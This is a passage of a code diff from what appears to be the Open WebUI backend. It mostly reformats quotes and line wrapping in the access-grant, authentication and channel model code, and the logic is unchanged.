+            'resource_id',
+            'principal_type',
+            'principal_id',
+            'permission',
+            name='uq_access_grant_grant',
         ),
     )
@@ -66,7 +62,7 @@ class AccessGrantResponse(BaseModel):
     permission: str

     @classmethod
-    def from_grant(cls, grant: "AccessGrantModel") -> "AccessGrantResponse":
+    def from_grant(cls, grant: 'AccessGrantModel') -> 'AccessGrantResponse':
         return cls(
             id=grant.id,
             principal_type=grant.principal_type,
@@ -100,14 +96,14 @@ def access_control_to_grants(
     if access_control is None:
         # NULL → public read (user:* for read)
         # Exception: files with NULL are private (owner-only), no grants needed
-        if resource_type != "file":
+        if resource_type != 'file':
             grants.append(
                 {
-                    "resource_type": resource_type,
-                    "resource_id": resource_id,
-                    "principal_type": "user",
-                    "principal_id": "*",
-                    "permission": "read",
+                    'resource_type': resource_type,
+                    'resource_id': resource_id,
+                    'principal_type': 'user',
+                    'principal_id': '*',
+                    'permission': 'read',
                 }
             )
         return grants
@@ -117,30 +113,30 @@ def access_control_to_grants(
         return grants

     # Parse structured permissions
-    for permission in ["read", "write"]:
+    for permission in ['read', 'write']:
         perm_data = access_control.get(permission, {})
         if not perm_data:
             continue

-        for group_id in perm_data.get("group_ids", []):
+        for group_id in perm_data.get('group_ids', []):
             grants.append(
                 {
-                    "resource_type": resource_type,
-                    "resource_id": resource_id,
-                    "principal_type": "group",
-                    "principal_id": group_id,
-                    "permission": permission,
+                    'resource_type': resource_type,
+                    'resource_id': resource_id,
+                    'principal_type': 'group',
+                    'principal_id': group_id,
+                    'permission': permission,
                 }
             )

-        for user_id in perm_data.get("user_ids", []):
+        for user_id in perm_data.get('user_ids', []):
             grants.append(
                 {
-                    "resource_type": resource_type,
-                    "resource_id": resource_id,
-                    "principal_type": "user",
-                    "principal_id": user_id,
-                    "permission": permission,
+                    'resource_type': resource_type,
+                    'resource_id': resource_id,
+                    'principal_type': 'user',
+                    'principal_id': user_id,
+                    'permission': permission,
                 }
             )
@@ -164,27 +160,23 @@ def normalize_access_grants(access_grants: Optional[list]) -> list[dict]:
         if not isinstance(grant, dict):
             continue

-        principal_type = grant.get("principal_type")
-        principal_id = grant.get("principal_id")
-        permission = grant.get("permission")
+        principal_type = grant.get('principal_type')
+        principal_id = grant.get('principal_id')
+        permission = grant.get('permission')

-        if principal_type not in ("user", "group"):
+        if principal_type not in ('user', 'group'):
             continue
-        if permission not in ("read", "write"):
+        if permission not in ('read', 'write'):
             continue
         if not isinstance(principal_id, str) or not principal_id:
             continue

         key = (principal_type, principal_id, permission)
         deduped[key] = {
-            "id": (
-                grant.get("id")
-                if isinstance(grant.get("id"), str) and grant.get("id")
-                else str(uuid.uuid4())
-            ),
-            "principal_type": principal_type,
-            "principal_id": principal_id,
-            "permission": permission,
+            'id': (grant.get('id') if isinstance(grant.get('id'), str) and grant.get('id') else str(uuid.uuid4())),
+            'principal_type': principal_type,
+            'principal_id': principal_id,
+            'permission': permission,
         }

     return list(deduped.values())
@@ -195,11 +187,7 @@ def has_public_read_access_grant(access_grants: Optional[list]) -> bool:
     Returns True when a direct grant list includes wildcard public-read.
     """
     for grant in normalize_access_grants(access_grants):
-        if (
-            grant["principal_type"] == "user"
-            and grant["principal_id"] == "*"
-            and grant["permission"] == "read"
-        ):
+        if grant['principal_type'] == 'user' and grant['principal_id'] == '*' and grant['permission'] == 'read':
             return True
     return False
@@ -209,7 +197,7 @@ def has_user_access_grant(access_grants: Optional[list]) -> bool:
     Returns True when a direct grant list includes any non-wildcard user grant.
     """
     for grant in normalize_access_grants(access_grants):
-        if grant["principal_type"] == "user" and grant["principal_id"] != "*":
+        if grant['principal_type'] == 'user' and grant['principal_id'] != '*':
             return True
     return False
@@ -225,18 +213,9 @@ def strip_user_access_grants(access_grants: Optional[list]) -> list:
         grant
         for grant in access_grants
         if not (
-            (
-                grant.get("principal_type")
-                if isinstance(grant, dict)
-                else getattr(grant, "principal_type", None)
-            )
-            == "user"
-            and (
-                grant.get("principal_id")
-                if isinstance(grant, dict)
-                else getattr(grant, "principal_id", None)
-            )
-            != "*"
+            (grant.get('principal_type') if isinstance(grant, dict) else getattr(grant, 'principal_type', None))
+            == 'user'
+            and (grant.get('principal_id') if isinstance(grant, dict) else getattr(grant, 'principal_id', None)) != '*'
         )
     ]
@@ -260,29 +239,25 @@ def grants_to_access_control(grants: list) -> Optional[dict]:
         return {}  # No grants = private/owner-only

     result = {
-        "read": {"group_ids": [], "user_ids": []},
-        "write": {"group_ids": [], "user_ids": []},
+        'read': {'group_ids': [], 'user_ids': []},
+        'write': {'group_ids': [], 'user_ids': []},
     }

     is_public = False
     for grant in grants:
-        if (
-            grant.principal_type == "user"
-            and grant.principal_id == "*"
-            and grant.permission == "read"
-        ):
+        if grant.principal_type == 'user' and grant.principal_id == '*' and grant.permission == 'read':
             is_public = True
             continue  # Don't add wildcard to user_ids list

-        if grant.permission not in ("read", "write"):
+        if grant.permission not in ('read', 'write'):
             continue

-        if grant.principal_type == "group":
-            if grant.principal_id not in result[grant.permission]["group_ids"]:
-                result[grant.permission]["group_ids"].append(grant.principal_id)
-        elif grant.principal_type == "user":
-            if grant.principal_id not in result[grant.permission]["user_ids"]:
-                result[grant.permission]["user_ids"].append(grant.principal_id)
+        if grant.principal_type == 'group':
+            if grant.principal_id not in result[grant.permission]['group_ids']:
+                result[grant.permission]['group_ids'].append(grant.principal_id)
+        elif grant.principal_type == 'user':
+            if grant.principal_id not in result[grant.permission]['user_ids']:
+                result[grant.permission]['user_ids'].append(grant.principal_id)

     if is_public:
         return None  # Public read access
@@ -399,9 +374,7 @@ def set_access_control(
         ).delete()

         # Convert JSON to grant dicts
-        grant_dicts = access_control_to_grants(
-            resource_type, resource_id, access_control
-        )
+        grant_dicts = access_control_to_grants(resource_type, resource_id, access_control)

         # Insert new grants
         results = []
@@ -442,9 +415,9 @@ def set_access_grants(
                 id=str(uuid.uuid4()),
                 resource_type=resource_type,
                 resource_id=resource_id,
-                principal_type=grant_dict["principal_type"],
-                principal_id=grant_dict["principal_id"],
-                permission=grant_dict["permission"],
+                principal_type=grant_dict['principal_type'],
+                principal_id=grant_dict['principal_id'],
+                permission=grant_dict['permission'],
                 created_at=int(time.time()),
             )
             db.add(grant)
@@ -511,9 +484,7 @@ def get_grants_by_resources(
                 )
                 .all()
             )
-            result: dict[str, list[AccessGrantModel]] = {
-                rid: [] for rid in resource_ids
-            }
+            result: dict[str, list[AccessGrantModel]] = {rid: [] for rid in resource_ids}
             for g in grants:
                 result[g.resource_id].append(AccessGrantModel.model_validate(g))
             return result
@@ -523,7 +494,7 @@ def has_access(
         user_id: str,
         resource_type: str,
         resource_id: str,
-        permission: str = "read",
+        permission: str = 'read',
         user_group_ids: Optional[set[str]] = None,
         db: Optional[Session] = None,
     ) -> bool:
@@ -540,12 +511,12 @@ def has_access(
             conditions = [
                 # Public access
                 and_(
-                    AccessGrant.principal_type == "user",
-                    AccessGrant.principal_id == "*",
+                    AccessGrant.principal_type == 'user',
+                    AccessGrant.principal_id == '*',
                 ),
                 # Direct user access
                 and_(
-                    AccessGrant.principal_type == "user",
+                    AccessGrant.principal_type == 'user',
                     AccessGrant.principal_id == user_id,
                 ),
             ]
@@ -560,7 +531,7 @@ def has_access(
             if user_group_ids:
                 conditions.append(
                     and_(
-                        AccessGrant.principal_type == "group",
+                        AccessGrant.principal_type == 'group',
                         AccessGrant.principal_id.in_(user_group_ids),
                     )
                 )
@@ -582,7 +553,7 @@ def get_accessible_resource_ids(
         user_id: str,
         resource_type: str,
        resource_ids: list[str],
-        permission: str = "read",
+        permission: str = 'read',
         user_group_ids: Optional[set[str]] = None,
         db: Optional[Session] = None,
     ) -> set[str]:
@@ -597,11 +568,11 @@ def get_accessible_resource_ids(
         with get_db_context(db) as db:
             conditions = [
                 and_(
-                    AccessGrant.principal_type == "user",
-                    AccessGrant.principal_id == "*",
+                    AccessGrant.principal_type == 'user',
+                    AccessGrant.principal_id == '*',
                 ),
                 and_(
-                    AccessGrant.principal_type == "user",
+                    AccessGrant.principal_type == 'user',
                     AccessGrant.principal_id == user_id,
                 ),
             ]
@@ -615,7 +586,7 @@ def get_accessible_resource_ids(
             if user_group_ids:
                 conditions.append(
                     and_(
-                        AccessGrant.principal_type == "group",
+                        AccessGrant.principal_type == 'group',
                         AccessGrant.principal_id.in_(user_group_ids),
                     )
                 )
@@ -637,7 +608,7 @@ def get_users_with_access(
         self,
         resource_type: str,
         resource_id: str,
-        permission: str = "read",
+        permission: str = 'read',
         db: Optional[Session] = None,
     ) -> list:
         """
@@ -660,19 +631,17 @@ def get_users_with_access(
         # Check for public access
         for grant in grants:
-            if grant.principal_type == "user" and grant.principal_id == "*":
-                result = Users.get_users(filter={"roles": ["!pending"]}, db=db)
-                return result.get("users", [])
+            if grant.principal_type == 'user' and grant.principal_id == '*':
+                result = Users.get_users(filter={'roles': ['!pending']}, db=db)
+                return result.get('users', [])

         user_ids_with_access = set()
         for grant in grants:
-            if grant.principal_type == "user":
+            if grant.principal_type == 'user':
                 user_ids_with_access.add(grant.principal_id)
-            elif grant.principal_type == "group":
-                group_user_ids = Groups.get_group_user_ids_by_id(
-                    grant.principal_id, db=db
-                )
+            elif grant.principal_type == 'group':
+                group_user_ids = Groups.get_group_user_ids_by_id(grant.principal_id, db=db)
                 if group_user_ids:
                     user_ids_with_access.update(group_user_ids)
@@ -688,20 +657,18 @@ def has_permission_filter(
         DocumentModel,
         filter: dict,
         resource_type: str,
-        permission: str = "read",
+        permission: str = 'read',
     ):
         """
         Apply access control filtering to a SQLAlchemy query by JOINing with access_grant.
         This replaces the old JSON-column-based filtering with a proper relational JOIN.
         """
-        group_ids = filter.get("group_ids", [])
-        user_id = filter.get("user_id")
+        group_ids = filter.get('group_ids', [])
+        user_id = filter.get('user_id')

-        if permission == "read_only":
-            return self._has_read_only_permission_filter(
-                db, query, DocumentModel, filter, resource_type
-            )
+        if permission == 'read_only':
+            return self._has_read_only_permission_filter(db, query, DocumentModel, filter, resource_type)

         # Build principal conditions
         principal_conditions = []
@@ -710,8 +677,8 @@ def has_permission_filter(
         # Public access: user:* read
         principal_conditions.append(
             and_(
-                AccessGrant.principal_type == "user",
-                AccessGrant.principal_id == "*",
+                AccessGrant.principal_type == 'user',
+                AccessGrant.principal_id == '*',
             )
         )
@@ -722,7 +689,7 @@ def has_permission_filter(
         # Direct user grant
         principal_conditions.append(
             and_(
-                AccessGrant.principal_type == "user",
+                AccessGrant.principal_type == 'user',
                 AccessGrant.principal_id == user_id,
             )
         )
@@ -731,7 +698,7 @@ def has_permission_filter(
         # Group grants
         principal_conditions.append(
             and_(
-                AccessGrant.principal_type == "group",
+                AccessGrant.principal_type == 'group',
                 AccessGrant.principal_id.in_(group_ids),
             )
         )
@@ -751,13 +718,13 @@ def has_permission_filter(
                 AccessGrant.permission == permission,
                 or_(
                     and_(
-                        AccessGrant.principal_type == "user",
-                        AccessGrant.principal_id == "*",
+                        AccessGrant.principal_type == 'user',
+                        AccessGrant.principal_id == '*',
                     ),
                     *(
                         [
                             and_(
-                                AccessGrant.principal_type == "user",
+                                AccessGrant.principal_type == 'user',
                                 AccessGrant.principal_id == user_id,
                             )
                         ]
@@ -767,7 +734,7 @@ def has_permission_filter(
                     *(
                         [
                             and_(
-                                AccessGrant.principal_type == "group",
+                                AccessGrant.principal_type == 'group',
                                 AccessGrant.principal_id.in_(group_ids),
                             )
                         ]
@@ -800,8 +767,8 @@ def _has_read_only_permission_filter(
         Filter for items where user has read BUT NOT write access.
         Public items are NOT considered read_only.
         """
-        group_ids = filter.get("group_ids", [])
-        user_id = filter.get("user_id")
+        group_ids = filter.get('group_ids', [])
+        user_id = filter.get('user_id')

         from sqlalchemy import exists as sa_exists, select
@@ -811,12 +778,12 @@ def _has_read_only_permission_filter(
             .where(
                 AccessGrant.resource_type == resource_type,
                 AccessGrant.resource_id == DocumentModel.id,
-                AccessGrant.permission == "read",
+                AccessGrant.permission == 'read',
                 or_(
                     *(
                         [
                             and_(
-                                AccessGrant.principal_type == "user",
+                                AccessGrant.principal_type == 'user',
                                 AccessGrant.principal_id == user_id,
                             )
                         ]
@@ -826,7 +793,7 @@
                     *(
                         [
                             and_(
-                                AccessGrant.principal_type == "group",
+                                AccessGrant.principal_type == 'group',
                                 AccessGrant.principal_id.in_(group_ids),
                             )
                         ]
@@ -845,12 +812,12 @@
             .where(
                 AccessGrant.resource_type == resource_type,
                 AccessGrant.resource_id == DocumentModel.id,
-                AccessGrant.permission == "write",
+                AccessGrant.permission == 'write',
                 or_(
                     *(
                         [
                             and_(
-                                AccessGrant.principal_type == "user",
+                                AccessGrant.principal_type == 'user',
                                 AccessGrant.principal_id == user_id,
                             )
                         ]
@@ -860,7 +827,7 @@
                    *(
                         [
                             and_(
-                                AccessGrant.principal_type == "group",
+                                AccessGrant.principal_type == 'group',
                                 AccessGrant.principal_id.in_(group_ids),
                             )
                         ]
@@ -879,9 +846,9 @@
             .where(
                 AccessGrant.resource_type == resource_type,
                 AccessGrant.resource_id == DocumentModel.id,
-                AccessGrant.permission == "read",
-                AccessGrant.principal_type == "user",
-                AccessGrant.principal_id == "*",
+                AccessGrant.permission == 'read',
+                AccessGrant.principal_type == 'user',
+                AccessGrant.principal_id == '*',
             )
             .correlate(DocumentModel)
             .exists()
backend/open_webui/models/auths.py +19 −33 modified
@@ -17,7 +17,7 @@
 class Auth(Base):
-    __tablename__ = "auth"
+    __tablename__ = 'auth'

     id = Column(String, primary_key=True, unique=True)
     email = Column(String)
@@ -73,9 +73,9 @@ class SignupForm(BaseModel):
     name: str
     email: str
     password: str
-    profile_image_url: Optional[str] = "/user.png"
+    profile_image_url: Optional[str] = '/user.png'

-    @field_validator("profile_image_url")
+    @field_validator('profile_image_url')
     @classmethod
     def check_profile_image_url(cls, v: Optional[str]) -> Optional[str]:
         if v is not None:
@@ -84,7 +84,7 @@ def check_profile_image_url(cls, v: Optional[str]) -> Optional[str]:

 class AddUserForm(SignupForm):
-    role: Optional[str] = "pending"
+    role: Optional[str] = 'pending'

 class AuthsTable:
@@ -93,25 +93,21 @@ def insert_new_auth(
         email: str,
         password: str,
         name: str,
-        profile_image_url: str = "/user.png",
-        role: str = "pending",
+        profile_image_url: str = '/user.png',
+        role: str = 'pending',
         oauth: Optional[dict] = None,
         db: Optional[Session] = None,
     ) -> Optional[UserModel]:
         with get_db_context(db) as db:
-            log.info("insert_new_auth")
+            log.info('insert_new_auth')

             id = str(uuid.uuid4())
-            auth = AuthModel(
-                **{"id": id, "email": email, "password": password, "active": True}
-            )
+            auth = AuthModel(**{'id': id, 'email': email, 'password': password, 'active': True})
             result = Auth(**auth.model_dump())
             db.add(result)

-            user = Users.insert_new_user(
-                id, name, email, profile_image_url, role, oauth=oauth, db=db
-            )
+            user = Users.insert_new_user(id, name, email, profile_image_url, role, oauth=oauth, db=db)

             db.commit()
             db.refresh(result)
@@ -124,7 +120,7 @@ def insert_new_auth(
     def authenticate_user(
         self, email: str, verify_password: callable, db: Optional[Session] = None
     ) -> Optional[UserModel]:
-        log.info(f"authenticate_user: {email}")
+        log.info(f'authenticate_user: {email}')

         user = Users.get_user_by_email(email, db=db)
         if not user:
@@ -143,10 +139,8 @@ def authenticate_user(
         except Exception:
             return None

-    def authenticate_user_by_api_key(
-        self, api_key: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
-        log.info(f"authenticate_user_by_api_key")
+    def authenticate_user_by_api_key(self, api_key: str, db: Optional[Session] = None) -> Optional[UserModel]:
+        log.info(f'authenticate_user_by_api_key')
         # if no api_key, return None
         if not api_key:
             return None
@@ -157,10 +151,8 @@ def authenticate_user_by_api_key(
         except Exception:
             return False

-    def authenticate_user_by_email(
-        self, email: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
-        log.info(f"authenticate_user_by_email: {email}")
+    def authenticate_user_by_email(self, email: str, db: Optional[Session] = None) -> Optional[UserModel]:
+        log.info(f'authenticate_user_by_email: {email}')
         try:
             with get_db_context(db) as db:
                 # Single JOIN query instead of two separate queries
@@ -177,28 +169,22 @@ def authenticate_user_by_email(
         except Exception:
             return None

-    def update_user_password_by_id(
-        self, id: str, new_password: str, db: Optional[Session] = None
-    ) -> bool:
+    def update_user_password_by_id(self, id: str, new_password: str, db: Optional[Session] = None) -> bool:
         try:
             with get_db_context(db) as db:
-                result = (
-                    db.query(Auth).filter_by(id=id).update({"password": new_password})
-                )
+                result = db.query(Auth).filter_by(id=id).update({'password': new_password})
                 db.commit()
                 return True if result == 1 else False
         except Exception:
             return False

-    def update_email_by_id(
-        self, id: str, email: str, db: Optional[Session] = None
-    ) -> bool:
+    def update_email_by_id(self, id: str, email: str, db: Optional[Session] = None) -> bool:
         try:
             with get_db_context(db) as db:
-                result = db.query(Auth).filter_by(id=id).update({"email": email})
+                result = db.query(Auth).filter_by(id=id).update({'email': email})
                 db.commit()

                 if result == 1:
-                    Users.update_user_by_id(id, {"email": email}, db=db)
+                    Users.update_user_by_id(id, {'email': email}, db=db)
                     return True
                 return False
         except Exception:
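The comment in authenticate_user_by_email notes that the lookup is now a single JOIN instead of two separate queries. A rough sketch of what such a query could look like; the exact filter set is an assumption, since only Auth.email, Auth.active, and the shared primary-key id are visible in this diff:

user = (
    db.query(User)
    .join(Auth, Auth.id == User.id)  # auth and user rows share the same id (assumption based on insert_new_auth)
    .filter(Auth.email == email, Auth.active.is_(True))
    .first()
)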
backend/open_webui/models/channels.py +112 −219 modified
@@ -37,7 +37,7 @@
 class Channel(Base):
-    __tablename__ = "channel"
+    __tablename__ = 'channel'

     id = Column(Text, primary_key=True, unique=True)
     user_id = Column(Text)
@@ -94,7 +94,7 @@ class ChannelModel(BaseModel):

 class ChannelMember(Base):
-    __tablename__ = "channel_member"
+    __tablename__ = 'channel_member'

     id = Column(Text, primary_key=True, unique=True)
     channel_id = Column(Text, nullable=False)
@@ -154,25 +154,19 @@ class ChannelMemberModel(BaseModel):

 class ChannelFile(Base):
-    __tablename__ = "channel_file"
+    __tablename__ = 'channel_file'

     id = Column(Text, unique=True, primary_key=True)
     user_id = Column(Text, nullable=False)
-    channel_id = Column(
-        Text, ForeignKey("channel.id", ondelete="CASCADE"), nullable=False
-    )
-    message_id = Column(
-        Text, ForeignKey("message.id", ondelete="CASCADE"), nullable=True
-    )
-    file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False)
+    channel_id = Column(Text, ForeignKey('channel.id', ondelete='CASCADE'), nullable=False)
+    message_id = Column(Text, ForeignKey('message.id', ondelete='CASCADE'), nullable=True)
+    file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False)

     created_at = Column(BigInteger, nullable=False)
     updated_at = Column(BigInteger, nullable=False)

-    __table_args__ = (
-        UniqueConstraint("channel_id", "file_id", name="uq_channel_file_channel_file"),
-    )
+    __table_args__ = (UniqueConstraint('channel_id', 'file_id', name='uq_channel_file_channel_file'),)

 class ChannelFileModel(BaseModel):
@@ -189,7 +183,7 @@ class ChannelFileModel(BaseModel):

 class ChannelWebhook(Base):
-    __tablename__ = "channel_webhook"
+    __tablename__ = 'channel_webhook'

     id = Column(Text, primary_key=True, unique=True)
     channel_id = Column(Text, nullable=False)
@@ -235,7 +229,7 @@ class ChannelResponse(ChannelModel):

 class ChannelForm(BaseModel):
-    name: str = ""
+    name: str = ''
     description: Optional[str] = None
     is_private: Optional[bool] = None
     data: Optional[dict] = None
@@ -255,24 +249,18 @@ class ChannelWebhookForm(BaseModel):

 class ChannelTable:
-    def _get_access_grants(
-        self, channel_id: str, db: Optional[Session] = None
-    ) -> list[AccessGrantModel]:
-        return AccessGrants.get_grants_by_resource("channel", channel_id, db=db)
+    def _get_access_grants(self, channel_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]:
+        return AccessGrants.get_grants_by_resource('channel', channel_id, db=db)

     def _to_channel_model(
         self,
         channel: Channel,
         access_grants: Optional[list[AccessGrantModel]] = None,
         db: Optional[Session] = None,
     ) -> ChannelModel:
-        channel_data = ChannelModel.model_validate(channel).model_dump(
-            exclude={"access_grants"}
-        )
-        channel_data["access_grants"] = (
-            access_grants
-            if access_grants is not None
-            else self._get_access_grants(channel_data["id"], db=db)
+        channel_data = ChannelModel.model_validate(channel).model_dump(exclude={'access_grants'})
+        channel_data['access_grants'] = (
+            access_grants if access_grants is not None else self._get_access_grants(channel_data['id'], db=db)
         )
         return ChannelModel.model_validate(channel_data)
@@ -313,20 +301,20 @@ def _create_membership_models(
         for uid in user_ids:
             model = ChannelMemberModel(
                 **{
-                    "id": str(uuid.uuid4()),
-                    "channel_id": channel_id,
-                    "user_id": uid,
-                    "status": "joined",
-                    "is_active": True,
-                    "is_channel_muted": False,
-                    "is_channel_pinned": False,
-                    "invited_at": now,
-                    "invited_by": invited_by,
-                    "joined_at": now,
-                    "left_at": None,
-                    "last_read_at": now,
-                    "created_at": now,
-                    "updated_at": now,
+                    'id': str(uuid.uuid4()),
+                    'channel_id': channel_id,
+                    'user_id': uid,
+                    'status': 'joined',
+                    'is_active': True,
+                    'is_channel_muted': False,
+                    'is_channel_pinned': False,
+                    'invited_at': now,
+                    'invited_by': invited_by,
+                    'joined_at': now,
+                    'left_at': None,
+                    'last_read_at': now,
+                    'created_at': now,
+                    'updated_at': now,
                 }
             )
             memberships.append(ChannelMember(**model.model_dump()))
@@ -339,19 +327,19 @@ def insert_new_channel(
         with get_db_context(db) as db:
             channel = ChannelModel(
                 **{
-                    **form_data.model_dump(exclude={"access_grants"}),
-                    "type": form_data.type if form_data.type else None,
-                    "name": form_data.name.lower(),
-                    "id": str(uuid.uuid4()),
-                    "user_id": user_id,
-                    "created_at": int(time.time_ns()),
-                    "updated_at": int(time.time_ns()),
-                    "access_grants": [],
+                    **form_data.model_dump(exclude={'access_grants'}),
+                    'type': form_data.type if form_data.type else None,
+                    'name': form_data.name.lower(),
+                    'id': str(uuid.uuid4()),
+                    'user_id': user_id,
+                    'created_at': int(time.time_ns()),
+                    'updated_at': int(time.time_ns()),
+                    'access_grants': [],
                 }
             )
-            new_channel = Channel(**channel.model_dump(exclude={"access_grants"}))
+            new_channel = Channel(**channel.model_dump(exclude={'access_grants'}))

-            if form_data.type in ["group", "dm"]:
+            if form_data.type in ['group', 'dm']:
                 users = self._collect_unique_user_ids(
                     invited_by=user_id,
                     user_ids=form_data.user_ids,
@@ -366,18 +354,14 @@ def insert_new_channel(
                 db.add_all(memberships)
             db.add(new_channel)
             db.commit()
-            AccessGrants.set_access_grants(
-                "channel", new_channel.id, form_data.access_grants, db=db
-            )
+            AccessGrants.set_access_grants('channel', new_channel.id, form_data.access_grants, db=db)
             return self._to_channel_model(new_channel, db=db)

     def get_channels(self, db: Optional[Session] = None) -> list[ChannelModel]:
         with get_db_context(db) as db:
             channels = db.query(Channel).all()
             channel_ids = [channel.id for channel in channels]
-            grants_map = AccessGrants.get_grants_by_resources(
-                "channel", channel_ids, db=db
-            )
+            grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db)
             return [
                 self._to_channel_model(
                     channel,
@@ -387,31 +371,27 @@ def get_channels(self, db: Optional[Session] = None) -> list[ChannelModel]:
                 for channel in channels
             ]

-    def _has_permission(self, db, query, filter: dict, permission: str = "read"):
+    def _has_permission(self, db, query, filter: dict, permission: str = 'read'):
         return AccessGrants.has_permission_filter(
             db=db,
             query=query,
             DocumentModel=Channel,
             filter=filter,
-            resource_type="channel",
+            resource_type='channel',
             permission=permission,
         )

-    def get_channels_by_user_id(
-        self, user_id: str, db: Optional[Session] = None
-    ) -> list[ChannelModel]:
+    def get_channels_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChannelModel]:
         with get_db_context(db) as db:
-            user_group_ids = [
-                group.id for group in Groups.get_groups_by_member_id(user_id, db=db)
-            ]
+            user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)]
             membership_channels = (
                 db.query(Channel)
                 .join(ChannelMember, Channel.id == ChannelMember.channel_id)
                 .filter(
                     Channel.deleted_at.is_(None),
                     Channel.archived_at.is_(None),
-                    Channel.type.in_(["group", "dm"]),
+                    Channel.type.in_(['group', 'dm']),
                     ChannelMember.user_id == user_id,
                     ChannelMember.is_active.is_(True),
                 )
@@ -423,29 +403,20 @@
                     Channel.archived_at.is_(None),
                     or_(
                         Channel.type.is_(None),  # True NULL/None
-                        Channel.type == "",  # Empty string
-                        and_(Channel.type != "group", Channel.type != "dm"),
+                        Channel.type == '',  # Empty string
+                        and_(Channel.type != 'group', Channel.type != 'dm'),
                     ),
                 )
-            query = self._has_permission(
-                db, query, {"user_id": user_id, "group_ids": user_group_ids}
-            )
+            query = self._has_permission(db, query, {'user_id': user_id, 'group_ids': user_group_ids})
             standard_channels = query.all()

             all_channels = membership_channels + standard_channels
             channel_ids = [c.id for c in all_channels]
-            grants_map = AccessGrants.get_grants_by_resources(
-                "channel", channel_ids, db=db
-            )
-            return [
-                self._to_channel_model(c, access_grants=grants_map.get(c.id, []), db=db)
-                for c in all_channels
-            ]
+            grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db)
+            return [self._to_channel_model(c, access_grants=grants_map.get(c.id, []), db=db) for c in all_channels]

-    def get_dm_channel_by_user_ids(
-        self, user_ids: list[str], db: Optional[Session] = None
-    ) -> Optional[ChannelModel]:
+    def get_dm_channel_by_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> Optional[ChannelModel]:
         with get_db_context(db) as db:
             # Ensure uniqueness in case a list with duplicates is passed
             unique_user_ids = list(set(user_ids))
@@ -471,7 +442,7 @@
                 db.query(Channel)
                 .filter(
                     Channel.id.in_(subquery),
-                    Channel.type == "dm",
+                    Channel.type == 'dm',
                 )
                 .first()
             )
@@ -488,32 +459,23 @@ def add_members_to_channel(
     ) -> list[ChannelMemberModel]:
         with get_db_context(db) as db:
             # 1. Collect all user_ids including groups + inviter
-            requested_users = self._collect_unique_user_ids(
-                invited_by, user_ids, group_ids
-            )
+            requested_users = self._collect_unique_user_ids(invited_by, user_ids, group_ids)

             existing_users = {
                 row.user_id
-                for row in db.query(ChannelMember.user_id)
-                .filter(ChannelMember.channel_id == channel_id)
-                .all()
+                for row in db.query(ChannelMember.user_id).filter(ChannelMember.channel_id == channel_id).all()
             }

             new_user_ids = requested_users - existing_users
             if not new_user_ids:
                 return []  # Nothing to add

-            new_memberships = self._create_membership_models(
-                channel_id, invited_by, new_user_ids
-            )
+            new_memberships = self._create_membership_models(channel_id, invited_by, new_user_ids)

             db.add_all(new_memberships)
             db.commit()
-            return [
-                ChannelMemberModel.model_validate(membership)
-                for membership in new_memberships
-            ]
+            return [ChannelMemberModel.model_validate(membership) for membership in new_memberships]

     def remove_members_from_channel(
         self,
@@ -533,9 +495,7 @@ def remove_members_from_channel(
             db.commit()
             return result  # number of rows deleted

-    def is_user_channel_manager(
-        self, channel_id: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def is_user_channel_manager(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             # Check if the user is the creator of the channel
             # or has a 'manager' role in ChannelMember
@@ -548,15 +508,13 @@
                 .filter(
                     ChannelMember.channel_id == channel_id,
                     ChannelMember.user_id == user_id,
-                    ChannelMember.role == "manager",
+                    ChannelMember.role == 'manager',
                 )
                 .first()
             )
             return membership is not None

-    def join_channel(
-        self, channel_id: str, user_id: str, db: Optional[Session] = None
-    ) -> Optional[ChannelMemberModel]:
+    def join_channel(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> Optional[ChannelMemberModel]:
         with get_db_context(db) as db:
             # Check if the membership already exists
             existing_membership = (
@@ -573,18 +531,18 @@ def join_channel(
             # Create new membership
             channel_member = ChannelMemberModel(
                 **{
-                    "id": str(uuid.uuid4()),
-                    "channel_id": channel_id,
-                    "user_id": user_id,
-                    "status": "joined",
-                    "is_active": True,
-                    "is_channel_muted": False,
-                    "is_channel_pinned": False,
-                    "joined_at": int(time.time_ns()),
-                    "left_at": None,
-                    "last_read_at": int(time.time_ns()),
-                    "created_at": int(time.time_ns()),
-                    "updated_at": int(time.time_ns()),
+                    'id': str(uuid.uuid4()),
+                    'channel_id': channel_id,
+                    'user_id': user_id,
+                    'status': 'joined',
+                    'is_active': True,
+                    'is_channel_muted': False,
+                    'is_channel_pinned': False,
+                    'joined_at': int(time.time_ns()),
+                    'left_at': None,
+                    'last_read_at': int(time.time_ns()),
+                    'created_at': int(time.time_ns()),
+                    'updated_at': int(time.time_ns()),
                 }
             )
             new_membership = ChannelMember(**channel_member.model_dump())
@@ -593,9 +551,7 @@
             db.commit()
             return channel_member

-    def leave_channel(
-        self, channel_id: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def leave_channel(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             membership = (
                 db.query(ChannelMember)
@@ -608,7 +564,7 @@
             if not membership:
                 return False

-            membership.status = "left"
+            membership.status = 'left'
             membership.is_active = False
             membership.left_at = int(time.time_ns())
             membership.updated_at = int(time.time_ns())
@@ -630,19 +586,10 @@ def get_member_by_channel_and_user_id(
             )
             return ChannelMemberModel.model_validate(membership) if membership else None

-    def get_members_by_channel_id(
-        self, channel_id: str, db: Optional[Session] = None
-    ) -> list[ChannelMemberModel]:
+    def get_members_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> list[ChannelMemberModel]:
         with get_db_context(db) as db:
-            memberships = (
-                db.query(ChannelMember)
-                .filter(ChannelMember.channel_id == channel_id)
-                .all()
-            )
-            return [
-                ChannelMemberModel.model_validate(membership)
-                for membership in memberships
-            ]
+            memberships = db.query(ChannelMember).filter(ChannelMember.channel_id == channel_id).all()
+            return [ChannelMemberModel.model_validate(membership) for membership in memberships]

     def pin_channel(
